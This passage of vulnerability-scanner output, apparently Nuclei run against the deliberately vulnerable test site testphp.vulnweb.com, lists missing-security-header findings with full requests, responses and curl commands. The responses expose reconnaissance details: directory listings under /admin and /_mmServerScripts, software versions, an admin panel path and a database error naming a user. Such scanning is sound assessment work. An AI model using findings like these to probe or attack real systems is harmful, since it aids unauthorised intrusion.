PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.510899022Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.510925688Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.510936828Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.522725607Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:40.894162614Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.134650467Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.134644763Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.134689813Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.587267132Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.587268946Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:41.587310811Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) 